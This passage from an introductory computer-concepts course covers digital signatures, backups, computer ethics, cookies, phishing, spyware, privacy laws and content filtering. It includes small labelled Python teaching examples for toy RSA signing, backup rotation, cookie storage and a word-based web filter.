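    """Anyone holding the sender's public key can check the signature; it fails
    both when the message content changed and when another key produced it."""
    e, n = public_key
    return pow(signature, e, n) == _digest(message, n)


if __name__ == "__main__":
    # Constructed teaching keys: 999983, 1000003, 10007 and 10009 are primes,
    # but far too small to resist factoring.
    alice_pub, alice_priv = generate_keypair(999983, 1000003)
    other_pub, other_priv = generate_keypair(10007, 10009)
    order = b"Pay 100 to account 42"
    ct = encrypt(alice_pub, order)                          # anyone can encrypt to Alice
    print(decrypt(alice_priv, ct))                          # only Alice's private key reads it
    sig = sign(alice_priv, order)                           # only Alice can produce this
    print(verify(alice_pub, order, sig))                    # True
    print(verify(alice_pub, b"Pay 900 to account 42", sig))  # False: content changed
    print(verify(other_pub, order, sig))                    # False: not Alice's key
```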
A digital certificate is a notice that guarantees a user or a website
is legitimate. E-commerce applications commonly use digital certificates.
Browsers often display a warning message if a website does not have a
valid digital certificate. A website that uses encryption techniques to secure
its data is known as a secure site (Figure 5-15). Web addresses of secure
sites often begin with https instead of http. Secure sites typically use digital
certificates along with security protocols.
INFORMATION THEFT
Digital Signatures and Certificates
Who issues digital certificates?
A certificate authority (CA) is an organization that
issues digital certificates. Each CA is a trusted third party that
takes responsibility for verifying the sender’s identity before
issuing a certificate. Individuals and companies can purchase
digital certificates from one of more than 35 online CA
providers. The cost varies depending on the desired level of
data encryption, with the strongest levels recommended for
financial and e-commerce transactions.
HARDWARE THEFT, VANDALISM AND FAILURE
Users rely on computers and mobile devices to create,
store, and manage important information. You should take
measures to protect computers and devices from theft,
vandalism, and failure.
Hardware theft is the act of stealing digital equipment.
Hardware vandalism involves defacing or destroying
digital equipment. Hardware can fail for a variety of reasons:
aging hardware, natural or man-made disasters, or random
events such as electrical power problems, and even errors in
programs or apps.
BACKING UP: THE ULTIMATE SAFEGUARD
To protect against data loss caused by hardware/software/information
theft or system failure, users should back up computer and mobile device files
regularly. As previously described, a backup is a duplicate of a file, program, or
media that can be used if the original is lost, damaged, or destroyed; and to
back up a file means to make a copy of it. In the case of system failure or the
discovery of corrupted files, you restore the files by copying the backed-up files
to their original location on the computer or mobile device.
If you choose to back up locally, be sure to use high-quality media. A
good choice for a home user might be optical discs or an external hard drive.
Keep your backup media in a fireproof and heatproof safe or vault, or offsite.
Off-site means in a location separate from where you typically store or use
your computer or mobile device. Keeping backup copies off-site minimizes the
chance that a single disaster, such as a fire, would destroy both the original
and the backup media. An off-site location can be a safe deposit box at a bank,
a briefcase, or cloud storage or cloud backup.
BACKING UP: THE ULTIMATE SAFEGUARD
Cloud storage provides storage to customers, usually
along with synchronization services but often on smaller
amounts of data. By contrast, cloud backup provides only
backup and retrieval services, but generally provides
continuous data protection (discussed next) to the cloud. More
customers are opting for cloud backup because it saves them
the cost of maintaining hardware.
BACKING UP: THE ULTIMATE SAFEGUARD

Backup programs are available from many sources. Most operating systems include
a backup program. Backup devices, such as external disk drives, also include backup
programs. Numerous stand-alone backup tools exist. Cloud storage providers may offer
backup services. Users of a cloud backup service install software on their computers that
backs up files to the cloud as they are modified.
Business and home users can perform four types of backup: full, differential,
incremental, or selective. A fifth type, continuous data protection, often is used only by large
enterprises to back up data to an in-house network storage device purchased and maintained
by the enterprise. Cloud backup services, a sixth option, are providing continuous data
protection capabilities at a lower cost. Table 5-2 summarizes the purpose, advantages, and
disadvantages of each of these backup methods.
Some users implement a three-generation backup policy to preserve three copies of
important files. The grandparent is the oldest copy of the file. The parent is the second oldest
copy of the file. The child is the most recent copy of the file. When a new backup is performed,
the child becomes the parent, the parent becomes the grandparent, and the media on which
the grandparent copy was stored may be erased and reused for a future backup.
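The backup types and the three-generation rotation described above, as an added Python example that is not from the textbook. Files are modelled as a constructed dictionary of path to last-modified time rather than real disk contents, and "media" are just labels.

```python
from __future__ import annotations

from datetime import datetime

# Constructed sample data: path -> time the file was last modified.
SAMPLE_FILES = {
    "docs/report.docx": datetime(2024, 3, 6, 9, 0),
    "docs/budget.xlsx": datetime(2024, 3, 4, 14, 30),
    "photos/trip.jpg": datetime(2024, 2, 20, 18, 0),
    "notes.txt": datetime(2024, 3, 6, 17, 45),
}
LAST_FULL = datetime(2024, 3, 3, 22, 0)     # Sunday night: last full backup
LAST_BACKUP = datetime(2024, 3, 5, 22, 0)   # Tuesday night: last backup of any kind


def select_files(files: dict[str, datetime], backup_type: str,
                 last_full: datetime | None = None,
                 last_backup: datetime | None = None,
                 selected: set[str] | None = None) -> list[str]:
    """Return the paths a backup of the given type copies.

    full         - every file (also forced when no full backup exists yet)
    differential - files changed since the last FULL backup
    incremental  - files changed since the last backup of ANY type
    selective    - only the files the user picked
    """
    if backup_type == "selective":
        return sorted(p for p in files if p in (selected or set()))
    if backup_type == "full" or last_full is None:
        return sorted(files)
    if backup_type == "differential":
        since = last_full
    elif backup_type == "incremental":
        since = last_backup or last_full
    else:
        raise ValueError(f"unknown backup type: {backup_type}")
    return sorted(path for path, modified in files.items() if modified > since)


def rotate(generations: dict[str, str | None],
           new_backup: str) -> tuple[dict[str, str | None], str | None]:
    """Three-generation rotation: child -> parent -> grandparent.

    Returns the updated generations and the medium freed for reuse (the old
    grandparent), or None when there was no grandparent copy yet.
    """
    updated = {
        "grandparent": generations.get("parent"),
        "parent": generations.get("child"),
        "child": new_backup,
    }
    return updated, generations.get("grandparent")


if __name__ == "__main__":
    for kind in ("full", "differential", "incremental"):
        print(kind, select_files(SAMPLE_FILES, kind, LAST_FULL, LAST_BACKUP))
    media = {"grandparent": "disc-A", "parent": "disc-B", "child": "disc-C"}
    media, reusable = rotate(media, "disc-D")
    print(media, "reusable:", reusable)   # disc-A may be erased and reused
```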
ETHICS AND SOCIETY
As with any powerful technology, computers can be used for both
good and bad intentions. The standards that determine whether an action
is good or bad are known as ethics. Computer ethics are the moral
guidelines that govern the use of computers and information systems. Six
frequently discussed areas of computer ethics are unauthorized use of
computers and networks, software theft (piracy), information accuracy,
intellectual property rights, green computing, and information privacy.
Previous sections in this chapter discussed unauthorized use of
computers and networks, and software theft (piracy). The following
sections discuss issues related to information accuracy, intellectual
property rights, green computing, and information privacy. The
questionnaire in Figure 8 raises issues in each of these areas.
ETHICS AND SOCIETY

INFORMATION ACCURACY
Information accuracy today is a concern because many users
access information maintained by other people or companies, such as on
the Internet. Do not assume that because the information is on the Web
that it is correct. Users should evaluate the value of a Web page before
relying on its content. Be aware that the organization providing access to
the information may not be the creator of the information.
In addition to concerns about the accuracy of computer input, some
individuals and organizations raise questions about the ethics of using
computers to alter output, primarily graphical output such as
retouched photos. Using graphics equipment and software, users easily
can digitize photos and then add, change, or remove images.
One group that completely opposes any manipulation of an image is the National
Press Photographers Association. It believes that allowing even the slightest alteration could
lead to misrepresentative photos. Others believe that digital photo retouching is acceptable as
long as the significant content or meaning of the photo does not change. Digital retouching is
an area in which legal precedents so far have not been established.
ETHICS AND SOCIETY

INTELLECTUAL PROPERTY RIGHTS
Intellectual property (IP) refers to unique and original works such as
ideas, inventions, art, writings, processes, company and product names, and
logos. Intellectual property rights are the rights to which creators are entitled
for their work. Certain issues arise surrounding IP today because many of
these works are available digitally.
A copyright gives authors and artists exclusive rights to duplicate,
publish, and sell their materials. A copyright protects any tangible form of
expression.
A common infringement of copyright is piracy. People pirate (illegally
copy) software, movies, and music. Many areas are not clear-cut with respect
to the law, because copyright law gives the public fair use to copyrighted
material. The issues surround the phrase, fair use, which allows use for
educational and critical purposes.
ETHICS AND SOCIETY

INTELLECTUAL PROPERTY RIGHTS
This vague definition is subject to widespread interpretation and raises many
questions:
• Should individuals be able to download contents of your Web site, modify it, and then put it
on the Web again as their own?
• Should a faculty member have the right to print material from the Web and distribute it to all
members of the class for teaching purposes only?
• Should someone be able to scan photos or pages from a book, publish them to the Web,
and allow others to download them?
• Should students be able to post term papers they have written on the Web, making it
tempting for other students to download and submit them as their own work?
These issues with copyright law led to the development of digital rights management (DRM),
a strategy designed to prevent illegal distribution of movies, music, and other digital content.
ETHICS AND SOCIETY

CODES OF CONDUCT
A code of conduct is a written guideline that helps determine whether a
specification is ethical/unethical or allowed/not allowed. An IT code of conduct focuses on
acceptable use of technology. Employers and schools often specify standards for the
ethical use of technology in an IT code of conduct and then distribute these standards to
employees and students (Figure 10). You also may find codes of conduct online that
define acceptable forms of communications for websites where users post commentary
or other communications, such as blogs, wikis, online discussions, and so on.
ETHICS AND SOCIETY

GREEN COMPUTING
Green computing involves reducing the electricity and environmental waste while
using a computer. People use, and often waste, resources such as electricity and paper
while using a computer. The United States government developed the ENERGY STAR
program to help reduce the amount of electricity used by computers and related devices.
This program encourages manufacturers to create energy-efficient devices that require
little power when they are not in use. Computers and devices that meet the ENERGY
STAR guidelines display an ENERGY STAR label.
Users should not store obsolete computers and devices in their basement,
storage room, attic, warehouse, or any other location. Computers, monitors, and other
equipment contain toxic materials and potentially dangerous elements including lead,
mercury, and flame retardants. In a landfill, these materials release into the environment.
Recycling and refurbishing old equipment are much safer alternatives for the
environment.
ETHICS AND SOCIETY

GREEN COMPUTING
Experts estimate that more than 700 million personal computers are obsolete.
Because of the huge volumes of electronic waste, the U.S. federal government has
proposed a bill that would require computer recycling across the country. Many state and
local governments have methods in place to make it easy for consumers to recycle this
type of equipment.
To reduce the environmental impact of computing further, users simply can alter
a few habits. To learn more about green computing, complete the Green Computing
exercise on the Web Research page in each chapter of this book.
INFORMATION PRIVACY

When you fill out a printed form, such as a magazine subscription or contest
entry, or an online form to sign up for a service, create a profile on an online social
network, or register a product warranty, the merchant that receives the form usually
stores the information you provide in a database. Likewise, every time you tap or click an
advertisement on the web or perform a search online, your information and preferences
enter a database. Some merchants may sell or share the contents of their databases with
national marketing firms and Internet advertising firms. By combining this data with
information from public records, such as driver’s licenses and vehicle registrations, these
firms can create an electronic profile of individuals. Electronic profiles may include
personal details, such as your age, address, phone number, marital status, number and
ages of dependents, interests, and spending habits.
INFORMATION PRIVACY

COOKIES
A cookie is a small text file that a web server stores on your computer. Cookie files
typically contain data about you, such as your user name, postal code, or viewing
preferences. Websites use cookies for a variety of purposes:
• Most websites that allow for personalization use cookies to track user preferences.
These cookies may obtain their values when a user fills in an online form requesting
personal information. Some websites, for example, store user names in cookies in
order to display a personalized greeting that welcomes the user, by name, back to the
website. Other websites allow users to customize their viewing experience with
preferences, such as local news headlines, the local weather forecast, or stock
quotes.
• Some websites use cookies to store user names and/or passwords, so that users do
not need to enter this information every time they sign in to the website.
INFORMATION PRIVACY

COOKIES
• Online shopping sites generally use a session cookie to keep track of items in a user’s
shopping cart. This way, users can start an order during one web session and finish it
on another day in another session. Session cookies usually expire after a certain time,
such as a week or a month.
• Some websites use cookies to track how often users visit a site and the webpages
they visit while at the website.
• Websites may use cookies to target advertisements. These websites store a user’s
interests and browsing habits in the cookie.
INFORMATION PRIVACY

COOKIES
Do websites ever sell information stored in cookies?
Some websites sell or trade information stored in your cookies to advertisers — a
practice many believe to be unethical. If you do not want personal information distributed, you
should limit the amount of information you provide to a website or adjust how your browser
handles cookies. You can regularly clear cookies or set your browser to accept cookies
automatically, prompt if you want to accept a cookie, or disable all cookie use. Keep in mind if
you disable cookie use, you may not be able to use some e-commerce websites. As an
alternative, you can purchase software that selectively blocks cookies.
Many commercial websites send a cookie to your browser; your computer’s hard
drive then stores the cookie. The next time you visit the website, your browser retrieves the
cookie from your hard drive and sends the data in the cookie to the website. Figure 14
illustrates how websites work with cookies. A website can read data only from its own cookie
file stored on your hard drive. That is, it cannot access or view any other data on your hard
drive — including another cookie file.
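The cookie handling just described (stored when the server sends it, returned only to the site that set it, dropped once it expires), as an added Python example that is not from the textbook; it uses the standard library's Set-Cookie parser, and the hostnames, cookie values and clock values are constructed.

```python
from __future__ import annotations

from http.cookies import SimpleCookie


class CookieJar:
    """Per-site cookie storage mimicking the browser behaviour described above."""

    def __init__(self) -> None:
        # host -> {cookie name: (value, expiry time or None)}
        self._store: dict[str, dict[str, tuple[str, float | None]]] = {}

    def store(self, host: str, set_cookie_header: str, now: float) -> None:
        """Save a cookie that the server at `host` sent in a Set-Cookie header."""
        parsed = SimpleCookie()
        parsed.load(set_cookie_header)
        for name, morsel in parsed.items():
            max_age = morsel["max-age"]          # "" when the server set no lifetime
            expires_at = now + int(max_age) if max_age else None
            self._store.setdefault(host, {})[name] = (morsel.value, expires_at)

    def cookies_for(self, host: str, now: float) -> dict[str, str]:
        """The cookies the browser sends back to `host`; another site's cookies
        are never returned, which is the isolation the text describes."""
        return {
            name: value
            for name, (value, expires_at) in self._store.get(host, {}).items()
            if expires_at is None or expires_at > now
        }

    def clear(self, host: str | None = None) -> None:
        """'Clear cookies' for one site, or for every site when host is None."""
        if host is None:
            self._store.clear()
        else:
            self._store.pop(host, None)


if __name__ == "__main__":
    jar = CookieJar()
    t0 = 1_700_000_000.0
    jar.store("shop.example", "cart=item42; Max-Age=60; Path=/", t0)
    jar.store("news.example", "user=dana", t0)
    print(jar.cookies_for("shop.example", t0 + 10))    # {'cart': 'item42'}
    print(jar.cookies_for("news.example", t0 + 10))    # {'user': 'dana'}
    print(jar.cookies_for("shop.example", t0 + 61))    # {} : the cart cookie expired
    print(jar.cookies_for("other.example", t0))        # {} : not that site's cookie
```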
INFORMATION PRIVACY

PHISHING
Phishing is a scam in which a perpetrator sends an official looking email
message that attempts to obtain your personal and/or financial information. These
messages look legitimate and request that you update credit card numbers, Social
Security numbers, bank account numbers, passwords, or other private information.
Clickjacking is yet another similar scam. With clickjacking, an object that can be
tapped or clicked — such as a button, image, or link — on a website, pop-up ad, pop-under
ad, or in an email message or text message contains a malicious program. When a
user taps or clicks the disguised object, a variety of nefarious events may occur. For
example, the user may be redirected to a phony website that requests personal
information, or a virus may download to the computer or mobile device. Browsers
typically include clickjacking protection.
INFORMATION PRIVACY

SPYWARE AND ADWARE
Spyware is a program placed on a computer or mobile device without the user’s
knowledge that secretly collects information about the user and then communicates the
information it collects to some outside source while the user is online. Some vendors or
employers use spyware to collect information about program usage or employees. Internet
advertising firms often collect information about users’ web browsing habits. Spyware can
enter your computer when you install a new program, through malware, or through a graphic
on a webpage or in an email message.
Adware is a program that displays an online advertisement in a banner, a pop-up
window, or pop-under window on webpages, email messages, or other Internet services.
Adware on mobile phones is known as madware, for mobile adware. Sometimes, spyware is
hidden in adware. To remove spyware and adware, you can obtain spyware removers,
adware removers, or malware removers that can detect and delete spyware and adware.
Some operating systems and browsers include spyware and adware removers.
INFORMATION PRIVACY

SOCIAL ENGINEERING
As related to the use of technology, social engineering is defined as gaining
unauthorized access to or obtaining confidential information by taking advantage of the
trusting human nature of some victims and the naivety of others. Some social engineers
trick their victims into revealing confidential information, such as user names and
passwords, on the phone, in person, or on the Internet. Techniques they use include
pretending to be an administrator or other authoritative figure, feigning an emergency
situation, or impersonating an acquaintance. Social engineers also obtain information
from users who do not destroy or conceal information properly. These perpetrators sift
through company dumpsters, watch or film people dialing phone numbers or using ATMs,
and snoop around computers or mobile devices looking for openly displayed confidential
information.
INFORMATION PRIVACY

SOCIAL ENGINEERING
To protect yourself from social engineering scams, follow these tips:
• Verify the identity of any person or organization requesting personal or confidential
information.
• When relaying personal or confidential information, ensure that only authorized people
can hear your conversation.
• When personal or confidential information appears on a computer or mobile device,
ensure that only authorized people can see your screen.
• Shred all sensitive or confidential documents.
• After using a public computer, clear the cache in its browser.
• Avoid using public computers to conduct banking or other sensitive transactions.
INFORMATION PRIVACY

PRIVACY LAWS
The concern about privacy has led to the enactment of federal and state laws
regarding the storage and disclosure of personal data, some of which are shown in the
table below. Common points in some of these laws are as follows:
1. Information collected and stored about individuals should be limited to what is necessary to
carry out the function of the business or government agency collecting the data.
2. Once collected, provisions should be made to protect the data so that only those
employees within the organization who need access to it to perform their job duties have
access to it.
3. Personal information should be released outside the organization collecting the data only
when the person has agreed to its disclosure.
4. When information is collected about an individual, the individual should know that the data
is being collected and have the opportunity to determine the accuracy of the data.
INFORMATION PRIVACY

EMPLOYEE MONITORING
Employee monitoring involves the use of computers, mobile devices, or
cameras to observe, record, and review an employee’s use of a technology, including
communications such as email messages, keyboard activity (used to measure
productivity), and websites visited. Many programs exist that easily allow employers to
monitor employees. Further, it is legal for employers to use these programs.
INFORMATION PRIVACY

CONTENT FILTERING
One of the more controversial issues that surround the Internet is its widespread
availability of objectionable material, such as prejudiced literature, violence, and obscene
photos. Some believe that such materials should be banned. Others believe that the
materials should be filtered, that is, restricted.
Content filtering is the process of restricting access to certain material. Many
businesses use content filtering to limit employees’ web access. These businesses argue
that employees are unproductive when visiting inappropriate or objectionable websites.
Some schools, libraries, and parents use content filtering to restrict access to minors.
Content filtering opponents argue that banning any materials violates constitutional
guarantees of free speech and personal rights.
INFORMATION PRIVACY

CONTENT FILTERING
Web filtering software is a program that restricts access to specified websites.
Some also filter sites that use specific words (Figure 5). Others allow you to filter email
messages, chat rooms, and programs. Many Internet security programs include a
firewall, antivirus program, and filtering capabilities combined. Browsers also often
include content filtering capabilities.
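The two checks the text attributes to web filtering software, a list of restricted websites and a list of restricted words, as an added Python example that is not from the textbook; the hostnames and word list are constructed.

```python
from __future__ import annotations

from urllib.parse import urlsplit

_PUNCTUATION = ".,!?;:\"'()[]"


class WebFilter:
    """Blocks requests to listed sites and pages containing listed words."""

    def __init__(self, blocked_hosts: set[str], blocked_words: set[str]) -> None:
        self.blocked_hosts = {h.lower() for h in blocked_hosts}
        self.blocked_words = {w.lower() for w in blocked_words}

    def host_blocked(self, host: str) -> bool:
        """A listed site blocks itself and every subdomain under it, but not
        a different domain that merely starts with the same name."""
        host = host.lower()
        return any(host == b or host.endswith("." + b) for b in self.blocked_hosts)

    def decide(self, url: str, page_text: str = "") -> tuple[str, str]:
        """Return ("block", reason) or ("allow", "") for a requested page."""
        host = urlsplit(url).hostname or ""
        if self.host_blocked(host):
            return "block", f"site {host} is on the blocked list"
        words = {w.strip(_PUNCTUATION).lower() for w in page_text.split()}
        hits = sorted(words & self.blocked_words)
        if hits:
            return "block", "page contains blocked words: " + ", ".join(hits)
        return "allow", ""


if __name__ == "__main__":
    web_filter = WebFilter({"casino.example"}, {"jackpot", "wager"})
    print(web_filter.decide("https://www.casino.example/play"))
    print(web_filter.decide("https://news.example/", "Local weather: sunny."))
    print(web_filter.decide("https://news.example/", "Place your wager on the Jackpot!"))
```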
END!
